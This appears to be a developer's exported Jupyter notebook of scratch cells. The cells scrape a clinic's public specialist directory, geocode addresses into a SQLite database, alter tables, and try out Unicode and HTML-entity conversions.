spe_options = [
    {'label': 'GY', 'value': 'GY'},
    {'label': 'MG-GY', 'value': 'MG-GY'},
    {'label': 'PE-PSY', 'value': 'PE-PSY'},
    {'label': 'SF', 'value': 'SF'},
    {'label': 'PE', 'value': 'PE'},
    {'label': 'GE', 'value': 'GE'},
    {'label': 'PSY', 'value': 'PSY'},
    {'label': 'NE', 'value': 'NE'},
    {'label': 'MG', 'value': 'MG'}
]

In [ ]:
uga_options = [
    {'label': '75AUT', 'value': '75AUT'},
    {'label': '75ELY', 'value': '75ELY'},
    {'label': '75GRE', 'value': '75GRE'},
    {'label': '75INV', 'value': '75INV'},
    {'label': '75MNP', 'value': '75MNP'},
    {'label': '75PAS', 'value': '75PAS'},
    {'label': '75PER', 'value': '75PER'},
    {'label': '75TER', 'value': '75TER'},
    {'label': '75TRO', 'value': '75TRO'},
    {'label': '75VAU', 'value': '75VAU'},
    {'label': '92LEV', 'value': '92LEV'},
    {'label': '92NEU', 'value': '92NEU'}
]

In [ ]:
datatable_cols

In [ ]:
[uga_options[i]["value"] for i in range(len(uga_options))]

# Clinique Sainte Thérèse

In [ ]:
doctors = {}

for i in range(1,5):    
    r = requests.get(f"https://www.cliniquesaintetherese.fr/fr/annuaire-specialistes/page-{i}")
    soup = BeautifulSoup(r.content, "html.parser")

    cells = soup.findAll("div", class_="cell auto")
    
    for j in range(len(cells)):
        
        cell = cells[j]
        name = cell.find("a", class_="js-annuaire-detail").text
        spec_div = cell.find("div", class_="list-annuaire__list--spe").findAll("a")
        
        for k in range(len(spec_div)):
            atag = spec_div[k]
            if atag.text:
                spec = atag.text
        doctors[name] = spec

In [ ]:
therese = pd.DataFrame.from_dict(doctors, orient="index")
therese.to_excel("/home/julien/Desktop/therese.xlsx", header=None)

# GEOPY

In [ ]:
load_dotenv(verbose=True)

In [ ]:
SQLALCHEMY_DATABASE_URI = environ.get("SQLALCHEMY_DATABASE_URI")

In [ ]:
SQLALCHEMY_DATABASE_URI

In [ ]:
import sqlite3
sqliteConnection = sqlite3.connect("app/data/biocodex.db")
cursor = sqliteConnection.cursor()

In [ ]:
from app import create_flask_server, dash_apps_factory

In [ ]:
from app.dashboards.biocodex.models import Adress

In [ ]:
from app.extensions import db

In [ ]:
engine = create_engine(
    'sqlite:////home/julien/website/app/data/biocodex.db'
)

with Session(engine) as session:
    id_cdb = pd.read_sql_query(            
        sql = session.query(
            Connections.doc_id, Identity.nom, Identity.prenom, Identity.spe, Identity.pot, Identity.pvm, Identity.nv2022,
            Adress.adresse, Adress.cp, Adress.ville, Adress.uga, Adress.tel).join(Identity).join(Adress).filter(Adress.id==1).statement,
        con=engine
    )
    session.close()

In [ ]:
from os import environ
from dotenv import load_dotenv

In [ ]:
engine = create_engine(
    'sqlite:////home/julien/website/app/data/biocodex.db'
)

with Session(engine) as session:
    adresses = pd.read_sql_query(
        session.query(Adress.id, Adress.adresse, Adress.cp, Adress.ville).statement,
        con=engine
    )

In [ ]:
from tqdm import notebook

In [ ]:
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent="mySecretAgent")

sqliteConnection = sqlite3.connect("app/data/biocodex.db")
cursor = sqliteConnection.cursor()

for i, row in adresses.iterrows():
    adr = row["adresse"] + " " + row["cp"] + " " +row["ville"]
    location = geolocator.geocode(adr)
    id = row['id']
    cursor.execute(f"UPDATE adresses SET lat=?, lon=? WHERE id=?", (location.latitude, location.longitude, id))

In [ ]:
from sqlalchemy import text

In [ ]:
import sqlite3

In [ ]:
query = """
BEGIN TRANSACTION;
ALTER TABLE adresses ADD lat REAL DEFAULT 0;
ALTER TABLE adresses ADD mat REAL DEFAULT 0;
COMMIT
"""

In [ ]:
# write the SQL query inside the text() block
sql_query = text(query)

In [ ]:
cursor.execute("ALTER TABLE adresses ADD lon REAL DEFAULT 0;")

In [ ]:
query="SELECT id, adresse, cp ,ville FROM adresses"
results = cursor.execute(query)

In [ ]:
# View the records
for record in results:
    print("\n", record)

In [ ]:
query = """
BEGIN TRANSACTION;
ALTER TABLE adresses ADD lat REAL DEFAULT 0;
ALTER TABLE adresses ADD mat REAL DEFAULT 0;
COMMIT
"""

In [ ]:
result = engine.execute(query).fetchall()
 
# print all the records
for i in result:
    print("\n", i)

In [ ]:
s =  'U+1F4CA'
s

In [ ]:
print('U+{:X}'.format(ord('🗓')))

In [ ]:
re.sub(r'U\+([0-9a-fA-F]+)', lambda m: chr(int(m.group(1),16)), s)

In [ ]:
chr(int('1F4CA',16))

In [ ]:
chr(int('1F5D3',16))

In [ ]:
uga = "75AUT"
nuga = "".join([f"{l}\n" for l in uga])

In [ ]:
print(nuga)

In [ ]:
import cgi
from bs4 import BeautifulStoneSoup

In [ ]:
def HTMLEntitiesToUnicode(text):
    """Converts HTML entities to unicode.  For example '&amp;' becomes '&'."""
    text = str(BeautifulStoneSoup(text, convertEntities=BeautifulStoneSoup.ALL_ENTITIES))
    return text

def unicodeToHTMLEntities(text):
    """Converts unicode to HTML entities.  For example '&' becomes '&amp;'."""
    text = cgi.escape(text).encode('ascii', 'xmlcharrefreplace')
    return text

text = "&amp;, &reg;, &lt;, &gt;, &cent;, &pound;, &yen;, &euro;, &sect;, &copy;"

uni = HTMLEntitiesToUnicode(text)
htmlent = unicodeToHTMLEntities(uni)

print(uni)
print(htmlent)